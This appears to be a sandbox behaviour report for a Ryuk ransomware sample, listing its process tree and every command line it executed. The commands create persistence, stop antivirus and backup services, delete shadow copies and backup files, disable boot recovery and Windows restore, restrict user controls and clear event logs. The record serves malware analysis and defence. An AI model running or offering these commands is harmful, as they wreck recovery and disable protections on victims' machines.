PID 1244 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 424 wrote to memory of 5032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 424 wrote to memory of 5032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe

"C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit

C:\Windows\system32\cmd.exe

cmd.exe /c taskkill /t /f /im sql*

C:\Windows\system32\taskkill.exe

taskkill /f /t /im veeam*

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\icacls.exe

icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2

C:\Windows\system32\taskkill.exe

taskkill /t /f /im sql*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\ProgramData\RyukReadMe.txt "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete

C:\Windows\system32\cmd.exe

cmd.exe /c wmic shadowcopy delete

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\RyukReadMe.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\system32\cmd.exe

cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop avpsus /y

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\net.exe

net stop avpsus /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop avpsus /y

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet/

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y

C:\Windows\system32\net.exe

net stop McAfeeDLPAgentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop McAfeeDLPAgentService /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop mfewc /y

C:\Windows\system32\net.exe

net stop mfewc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mfewc /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y

C:\Windows\system32\net.exe

net stop BMR Boot Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BMR Boot Service /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\net.exe

net stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled

C:\Windows\system32\sc.exe

sc config SQLTELEMETRY start=disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\system32\sc.exe

sc config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled

C:\Windows\system32\sc.exe

sc config SQLWriter start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled

C:\Windows\system32\sc.exe

sc config SstpSvc start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mspub.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mydesktopqos.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mydesktopservice.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del %0

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s hrmlog2

C:\Windows\system32\attrib.exe

attrib +h +s hrmlog2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog2

C:\Windows\system32\attrib.exe

attrib +h +s C:\ProgramData\hrmlog2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wevtutil.exe el

C:\Windows\system32\wevtutil.exe

wevtutil.exe el

